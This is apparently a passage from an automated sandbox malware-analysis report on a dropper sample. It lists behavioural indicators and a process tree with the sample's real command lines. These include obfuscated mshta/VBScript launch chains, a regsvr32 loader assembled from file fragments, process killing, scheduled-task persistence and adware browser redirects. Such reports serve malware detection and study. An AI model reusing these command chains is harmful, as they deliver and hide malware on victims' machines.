fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Mejaelaelolae.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1264 toolspab1.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 812 toolspab2 (20).exe 812 toolspab2 (20).exe 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1356 Process not Found 736 iexplore.exe -
Suspicious behavior: MapViewOfSection 64 IoCs
pid Process 812 toolspab2 (20).exe 1920 177A.exe 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1644 explorer.exe 1644 explorer.exe 1136 explorer.exe 1136 explorer.exe 1948 explorer.exe 1948 explorer.exe 1188 explorer.exe 1188 explorer.exe 1656 explorer.exe 1656 explorer.exe 1952 explorer.exe 1952 explorer.exe 2160 htwccub 2536 tjwccub 1136 explorer.exe 1136 explorer.exe 1948 explorer.exe 1948 explorer.exe 1656 explorer.exe 1656 explorer.exe 1952 explorer.exe 1952 explorer.exe 1188 explorer.exe 1188 explorer.exe 1656 explorer.exe 1656 explorer.exe 1952 explorer.exe 1952 explorer.exe 1188 explorer.exe 1188 explorer.exe 3028 htwccub 2864 tjwccub 1656 explorer.exe 1656 explorer.exe 1188 explorer.exe 1188 explorer.exe 1952 explorer.exe 1952 explorer.exe 1656 explorer.exe 1656 explorer.exe 1952 explorer.exe 1952 explorer.exe 1188 explorer.exe 1188 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1700 591C.exe Token: SeDebugPrivilege 1732 591C.exe Token: SeDebugPrivilege 1624 taskkill.exe Token: SeShutdownPrivilege 1356 Process not Found Token: SeShutdownPrivilege 1356 Process not Found Token: SeShutdownPrivilege 1356 Process not Found Token: SeDebugPrivilege 1720 27B3.exe Token: SeImpersonatePrivilege 1720 27B3.exe Token: SeShutdownPrivilege 1356 Process not Found Token: SeShutdownPrivilege 1356 Process not Found Token: SeCreateTokenPrivilege 856 8187.exe Token: SeAssignPrimaryTokenPrivilege 856 8187.exe Token: SeLockMemoryPrivilege 856 8187.exe Token: SeIncreaseQuotaPrivilege 856 8187.exe Token: SeMachineAccountPrivilege 856 8187.exe Token: SeTcbPrivilege 856 8187.exe Token: SeSecurityPrivilege 856 8187.exe Token: SeTakeOwnershipPrivilege 856 8187.exe Token: SeLoadDriverPrivilege 856 8187.exe Token: SeSystemProfilePrivilege 856 8187.exe Token: SeSystemtimePrivilege 856 8187.exe Token: SeProfSingleProcessPrivilege 856 8187.exe Token: SeIncBasePriorityPrivilege 856 8187.exe Token: SeCreatePagefilePrivilege 856 8187.exe Token: SeCreatePermanentPrivilege 856 8187.exe Token: SeBackupPrivilege 856 8187.exe Token: SeRestorePrivilege 856 8187.exe Token: SeShutdownPrivilege 856 8187.exe Token: SeDebugPrivilege 856 8187.exe Token: SeAuditPrivilege 856 8187.exe Token: SeSystemEnvironmentPrivilege 856 8187.exe Token: SeChangeNotifyPrivilege 856 8187.exe Token: SeRemoteShutdownPrivilege 856 8187.exe Token: SeUndockPrivilege 856 8187.exe Token: SeSyncAgentPrivilege 856 8187.exe Token: SeEnableDelegationPrivilege 856 8187.exe Token: SeManageVolumePrivilege 856 8187.exe Token: SeImpersonatePrivilege 856 8187.exe Token: SeCreateGlobalPrivilege 856 8187.exe Token: 31 856 8187.exe Token: 32 856 8187.exe Token: 33 856 8187.exe Token: 34 856 8187.exe Token: 35 856 8187.exe Token: SeShutdownPrivilege 1356 Process not Found Token: SeDebugPrivilege 2428 taskkill.exe Token: SeShutdownPrivilege 1356 Process not Found Token: SeShutdownPrivilege 1356 Process not Found Token: SeDebugPrivilege 1176 Mejaelaelolae.exe Token: SeShutdownPrivilege 1356 Process not Found Token: SeDebugPrivilege 2104 8C32.exe Token: SeShutdownPrivilege 1356 Process not Found Token: SeShutdownPrivilege 1356 Process not Found Token: SeShutdownPrivilege 1356 Process not Found Token: SeShutdownPrivilege 1356 Process not Found Token: SeShutdownPrivilege 1356 Process not Found Token: SeShutdownPrivilege 1356 Process not Found Token: SeShutdownPrivilege 1356 Process not Found Token: SeShutdownPrivilege 1356 Process not Found Token: SeShutdownPrivilege 1356 Process not Found Token: SeShutdownPrivilege 1356 Process not Found Token: SeShutdownPrivilege 1356 Process not Found Token: SeShutdownPrivilege 1356 Process not Found Token: SeShutdownPrivilege 1356 Process not Found -
Suspicious use of FindShellTrayWindow 13 IoCs
pid Process 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1620 irecord.tmp 736 iexplore.exe 736 iexplore.exe 736 iexplore.exe 736 iexplore.exe 736 iexplore.exe 736 iexplore.exe -
Suspicious use of SendNotifyMessage 11 IoCs
pid Process 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found 1356 Process not Found -
Suspicious use of SetWindowsHookEx 36 IoCs
pid Process 736 iexplore.exe 736 iexplore.exe 736 iexplore.exe 736 iexplore.exe 2584 IEXPLORE.EXE 2584 IEXPLORE.EXE 736 iexplore.exe 736 iexplore.exe 1944 IEXPLORE.EXE 1944 IEXPLORE.EXE 1944 IEXPLORE.EXE 1944 IEXPLORE.EXE 736 iexplore.exe 736 iexplore.exe 2284 IEXPLORE.EXE 2284 IEXPLORE.EXE 2284 IEXPLORE.EXE 2284 IEXPLORE.EXE 736 iexplore.exe 736 iexplore.exe 2200 IEXPLORE.EXE 2200 IEXPLORE.EXE 2200 IEXPLORE.EXE 2200 IEXPLORE.EXE 736 iexplore.exe 736 iexplore.exe 2248 IEXPLORE.EXE 2248 IEXPLORE.EXE 2984 IEXPLORE.EXE 2984 IEXPLORE.EXE 736 iexplore.exe 736 iexplore.exe 2984 IEXPLORE.EXE 2984 IEXPLORE.EXE 2984 IEXPLORE.EXE 2984 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 452 wrote to memory of 812 452 toolspab2 (20).exe 29 PID 452 wrote to memory of 812 452 toolspab2 (20).exe 29 PID 452 wrote to memory of 812 452 toolspab2 (20).exe 29 PID 452 wrote to memory of 812 452 toolspab2 (20).exe 29 PID 452 wrote to memory of 812 452 toolspab2 (20).exe 29 PID 452 wrote to memory of 812 452 toolspab2 (20).exe 29 PID 452 wrote to memory of 812 452 toolspab2 (20).exe 29 PID 1356 wrote to memory of 268 1356 Process not Found 30 PID 1356 wrote to memory of 268 1356 Process not Found 30 PID 1356 wrote to memory of 268 1356 Process not Found 30 PID 1356 wrote to memory of 268 1356 Process not Found 30 PID 1356 wrote to memory of 1184 1356 Process not Found 31 PID 1356 wrote to memory of 1184 1356 Process not Found 31 PID 1356 wrote to memory of 1184 1356 Process not Found 31 PID 1356 wrote to memory of 1184 1356 Process not Found 31 PID 1356 wrote to memory of 1300 1356 Process not Found 32 PID 1356 wrote to memory of 1300 1356 Process not Found 32 PID 1356 wrote to memory of 1300 1356 Process not Found 32 PID 1356 wrote to memory of 1300 1356 Process not Found 32 PID 1356 wrote to memory of 1920 1356 Process not Found 33 PID 1356 wrote to memory of 1920 1356 Process not Found 33 PID 1356 wrote to memory of 1920 1356 Process not Found 33 PID 1356 wrote to memory of 1920 1356 Process not Found 33 PID 1356 wrote to memory of 1700 1356 Process not Found 34 PID 1356 wrote to memory of 1700 1356 Process not Found 34 PID 1356 wrote to memory of 1700 1356 Process not Found 34 PID 1356 wrote to memory of 1700 1356 Process not Found 34 PID 1356 wrote to memory of 1176 1356 Process not Found 35 PID 1356 wrote to memory of 1176 1356 Process not Found 35 PID 1356 wrote to memory of 1176 1356 Process not Found 35 PID 1356 wrote to memory of 1176 1356 Process not Found 35 PID 1356 wrote to memory of 1176 1356 Process not Found 35 PID 1356 wrote to memory of 1620 1356 Process not Found 36 PID 1356 wrote to memory of 1620 1356 Process not Found 36 PID 1356 wrote to memory of 1620 1356 Process not Found 36 PID 1356 wrote to memory of 1620 1356 Process not Found 36 PID 1356 wrote to memory of 1188 1356 Process not Found 37 PID 1356 wrote to memory of 1188 1356 Process not Found 37 PID 1356 wrote to memory of 1188 1356 Process not Found 37 PID 1356 wrote to memory of 1188 1356 Process not Found 37 PID 1356 wrote to memory of 1188 1356 Process not Found 37 PID 1700 wrote to memory of 1732 1700 591C.exe 38 PID 1700 wrote to memory of 1732 1700 591C.exe 38 PID 1700 wrote to memory of 1732 1700 591C.exe 38 PID 1700 wrote to memory of 1732 1700 591C.exe 38 PID 1356 wrote to memory of 1136 1356 Process not Found 39 PID 1356 wrote to memory of 1136 1356 Process not Found 39 PID 1356 wrote to memory of 1136 1356 Process not Found 39 PID 1356 wrote to memory of 1136 1356 Process not Found 39 PID 1700 wrote to memory of 1732 1700 591C.exe 38 PID 1700 wrote to memory of 1732 1700 591C.exe 38 PID 1700 wrote to memory of 1732 1700 591C.exe 38 PID 1700 wrote to memory of 1732 1700 591C.exe 38 PID 1700 wrote to memory of 1732 1700 591C.exe 38 PID 1356 wrote to memory of 1952 1356 Process not Found 40 PID 1356 wrote to memory of 1952 1356 Process not Found 40 PID 1356 wrote to memory of 1952 1356 Process not Found 40 PID 1356 wrote to memory of 1952 1356 Process not Found 40 PID 1356 wrote to memory of 1952 1356 Process not Found 40 PID 1356 wrote to memory of 1644 1356 Process not Found 41 PID 1356 wrote to memory of 1644 1356 Process not Found 41 PID 1356 wrote to memory of 1644 1356 Process not Found 41 PID 1356 wrote to memory of 1644 1356 Process not Found 41 PID 1356 wrote to memory of 1656 1356 Process not Found 42
Processes
-
C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe"C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe"C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe"2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:812
-
-
C:\Users\Admin\AppData\Local\Temp\EA30.exeC:\Users\Admin\AppData\Local\Temp\EA30.exe1⤵
- Executes dropped EXE
PID:268
-
C:\Users\Admin\AppData\Local\Temp\EC91.exeC:\Users\Admin\AppData\Local\Temp\EC91.exe1⤵
- Executes dropped EXE
PID:1184
-
C:\Users\Admin\AppData\Local\Temp\11BE.exeC:\Users\Admin\AppData\Local\Temp\11BE.exe1⤵
- Executes dropped EXE
PID:1300
-
C:\Users\Admin\AppData\Local\Temp\177A.exeC:\Users\Admin\AppData\Local\Temp\177A.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1920
-
C:\Users\Admin\AppData\Local\Temp\591C.exeC:\Users\Admin\AppData\Local\Temp\591C.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Users\Admin\AppData\Local\Temp\591C.exeC:\Users\Admin\AppData\Local\Temp\591C.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1176
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1620
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:1188
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:1136
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:1952
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:1644
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:1656
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:1948
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:744
-
C:\Users\Admin\AppData\Local\Temp\F4A1.exeC:\Users\Admin\AppData\Local\Temp\F4A1.exe1⤵
- Executes dropped EXE
PID:296 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPt: CloSE ( cREaTEoBJecT ( "wscriPt.shEll" ). Run ( "CMD.Exe /q /C copY /y ""C:\Users\Admin\AppData\Local\Temp\F4A1.exe"" ..\U1PwSASbnJZ1Nt2.eXE && StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF """" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\F4A1.exe"" ) do taskkill -iM ""%~NxE"" -f " , 0 , TRuE ) )2⤵
- Modifies Internet Explorer settings
PID:1232 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C copY /y "C:\Users\Admin\AppData\Local\Temp\F4A1.exe" ..\U1PwSASbnJZ1Nt2.eXE && StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF "" == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\F4A1.exe" ) do taskkill -iM "%~NxE" -f3⤵
- Loads dropped DLL
PID:1848 -
C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS4⤵
- Executes dropped EXE
PID:1464 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPt: CloSE ( cREaTEoBJecT ( "wscriPt.shEll" ). Run ( "CMD.Exe /q /C copY /y ""C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE"" ..\U1PwSASbnJZ1Nt2.eXE && StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF ""/P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS "" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE"" ) do taskkill -iM ""%~NxE"" -f " , 0 , TRuE ) )5⤵PID:1228
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C copY /y "C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE" ..\U1PwSASbnJZ1Nt2.eXE && StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF "/P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS " == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE" ) do taskkill -iM "%~NxE" -f6⤵PID:896
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRipt: clOSe ( CreATeobJECT ( "WScRIpT.SHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C echo G9wY7C:\Users\Admin\AppData\Local\TempEfSQ> XVLAANMN.HX&echo | Set /p = ""MZ"" > P6JDQwUY.2 & COPY /B /y P6JDQwUY.2 + JRtfD7.X + DYta.ASk + I6sjWDN.8 + M0GT.7_ +XVLAANmN.HX ..\FRKN5p.zE & sTArt regsvr32 /u ..\FRKN5P.zE /S& dEl /q * " , 0 , TruE ) )5⤵
- Modifies Internet Explorer settings
PID:1112 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C echo G9wY7C:\Users\Admin\AppData\Local\TempEfSQ> XVLAANMN.HX&echo | Set /p = "MZ" > P6JDQwUY.2 & COPY /B /y P6JDQwUY.2 + JRtfD7.X + DYta.ASk + I6sjWDN.8 + M0GT.7_+XVLAANmN.HX ..\FRKN5p.zE& sTArt regsvr32 /u ..\FRKN5P.zE /S& dEl /q *6⤵PID:944
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo "7⤵PID:1616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>P6JDQwUY.2"7⤵PID:452
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /u ..\FRKN5P.zE /S7⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:632
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "F4A1.exe" -f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1AC7.exeC:\Users\Admin\AppData\Local\Temp\1AC7.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1600 -
C:\Users\Admin\AppData\Local\Temp\is-LN25F.tmp\1AC7.tmp"C:\Users\Admin\AppData\Local\Temp\is-LN25F.tmp\1AC7.tmp" /SL5="$2019E,188175,104448,C:\Users\Admin\AppData\Local\Temp\1AC7.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1072 -
C:\Users\Admin\AppData\Local\Temp\is-E8URM.tmp\134 Vaporeondè_éçè_)))_.exe"C:\Users\Admin\AppData\Local\Temp\is-E8URM.tmp\134 Vaporeondè_éçè_)))_.exe" /S /UID=rec73⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:1288 -
C:\Program Files\7-Zip\OCEKORKVLM\irecord.exe"C:\Program Files\7-Zip\OCEKORKVLM\irecord.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:892 -
C:\Users\Admin\AppData\Local\Temp\is-014S7.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-014S7.tmp\irecord.tmp" /SL5="$601BA,5808768,66560,C:\Program Files\7-Zip\OCEKORKVLM\irecord.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:1620 -
C:\Program Files (x86)\i-record\I-Record.exe"C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1756
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\91-1b947-4e9-8a791-47306057df8c1\Sepypitiqy.exe"C:\Users\Admin\AppData\Local\Temp\91-1b947-4e9-8a791-47306057df8c1\Sepypitiqy.exe"4⤵
- Executes dropped EXE
PID:2040 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e65⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:736 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:736 CREDAT:275457 /prefetch:26⤵
- Modifies Internet Explorer settings
PID:2144
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:736 CREDAT:472066 /prefetch:26⤵
- Suspicious use of SetWindowsHookEx
PID:2584
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:736 CREDAT:537607 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1944
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:736 CREDAT:930826 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2284
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:736 CREDAT:1127443 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2200
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:736 CREDAT:472117 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2248
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:736 CREDAT:1717267 /prefetch:26⤵PID:1660
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:736 CREDAT:1520678 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2984
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad5⤵PID:1588
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18514835⤵PID:2668
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18515135⤵PID:2564
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=20872155⤵PID:1092
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=42631195⤵PID:1832
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=12942315⤵PID:2744
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb-cc955-0c3-5d7b8-7466f23ae25a7\Mejaelaelolae.exe"C:\Users\Admin\AppData\Local\Temp\bb-cc955-0c3-5d7b8-7466f23ae25a7\Mejaelaelolae.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1176 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5gufj4eo.qzc\GcleanerEU.exe /eufive & exit5⤵PID:2852
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kwbpndzj.aas\installer.exe /qn CAMPAIGN="654" & exit5⤵PID:3056
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y112kni0.mth\google-game.exe & exit5⤵PID:2196
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wjaoo53t.eyb\GcleanerWW.exe /mixone & exit5⤵PID:2908
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\msd2ccuo.v2k\toolspab1.exe & exit5⤵PID:2396
-
C:\Users\Admin\AppData\Local\Temp\msd2ccuo.v2k\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\msd2ccuo.v2k\toolspab1.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1264 -
C:\Users\Admin\AppData\Local\Temp\msd2ccuo.v2k\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\msd2ccuo.v2k\toolspab1.exe7⤵
- Executes dropped EXE
PID:2608
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\27B3.exeC:\Users\Admin\AppData\Local\Temp\27B3.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1720 -
C:\Users\Admin\AppData\Local\Temp\27B3.exe"C:\Users\Admin\AppData\Local\Temp\27B3.exe"2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Modifies system certificate store
PID:1196
-
-
C:\Users\Admin\AppData\Local\Temp\8187.exeC:\Users\Admin\AppData\Local\Temp\8187.exe1⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:856 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵PID:2392
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
-
-
C:\Users\Admin\AppData\Local\Temp\8C32.exeC:\Users\Admin\AppData\Local\Temp\8C32.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
C:\Windows\system32\taskeng.exetaskeng.exe {2478B2E5-C1DC-4C32-A8C4-6887E54FABE4} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]1⤵PID:2184
-
C:\Users\Admin\AppData\Roaming\tjwccubC:\Users\Admin\AppData\Roaming\tjwccub2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2536
-
-
C:\Users\Admin\AppData\Roaming\htwccubC:\Users\Admin\AppData\Roaming\htwccub2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2224 -
C:\Users\Admin\AppData\Roaming\htwccubC:\Users\Admin\AppData\Roaming\htwccub3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2160
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {FF063893-4957-4E2A-A655-4909E619AA1C} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]1⤵PID:984
-
C:\Users\Admin\AppData\Roaming\tjwccubC:\Users\Admin\AppData\Roaming\tjwccub2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2864
-
-
C:\Users\Admin\AppData\Roaming\htwccubC:\Users\Admin\AppData\Roaming\htwccub2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1592 -
C:\Users\Admin\AppData\Roaming\htwccubC:\Users\Admin\AppData\Roaming\htwccub3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3028
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {135C5CF9-04EE-4156-9DEE-F4938DB304C1} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]1⤵PID:2880
-
C:\Users\Admin\AppData\Roaming\tjwccubC:\Users\Admin\AppData\Roaming\tjwccub2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:2132
-
-
C:\Users\Admin\AppData\Roaming\htwccubC:\Users\Admin\AppData\Roaming\htwccub2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2280 -
C:\Users\Admin\AppData\Roaming\htwccubC:\Users\Admin\AppData\Roaming\htwccub3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:2496
-
-
-
